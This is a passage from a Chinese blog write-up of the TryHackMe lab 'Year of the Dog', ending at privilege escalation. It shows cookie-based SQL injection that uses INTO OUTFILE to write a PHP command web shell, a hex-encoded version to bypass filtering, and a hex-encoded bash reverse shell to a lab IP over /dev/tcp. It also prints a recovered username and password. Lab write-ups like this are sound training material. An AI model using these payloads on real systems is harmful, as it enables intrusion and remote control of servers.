扫描打点
80
扫一下没东西,
F12
也没但抓包看到有个
cookie
,但我并没有登录cookie
处有sql
注入,order by
出来是两个字段
sql
注入写马拿shell
但由于没有登录入口,这里爆出来密码也没什么用,考虑仿照
holo
那样用sql
来写马:1
UNION SELECT 1,'<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php' -- -
逮捕啊嗯
考虑用
hex
绕一下1
UNION SELECT 1,unhex('3c3f7068702024636d643d245f4745545b22636d64225d3b73797374656d2824636d64293b3f3e') INTO OUTFILE '/var/www/html/noone.php'-- -
然后发现rce的反弹
shell
连不上,考虑直接传个上去1
UNION SELECT 1,unhex('3c3f706870206578656328222f62696e2f62617368202d63202762617368202d69203e202f6465762f7463702f31302e31302e31322e38372f3132333420303e26312722293b203f3e') INTO OUTFILE '/var/www/html/reverse2.php'-- -
文件内敏感信息横向
研究下横向:从
/home
中看到要横向到dylan
切到他的目录看看,发现一个
work_analysis
用
grep -Ri dylan 2>/dev/null
来搜索关于dylan
的地方:这个地方长得像账密,即
dylan:Labr4d0rs4L1f3
直接登上去
提权
不会,看
wp
用
ss -tul
THM打靶日寄21-Year of the Dog
- 本文链接: http://noone40404.github.io/2024/11/17/THM打靶日寄22:Year of the Dog/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!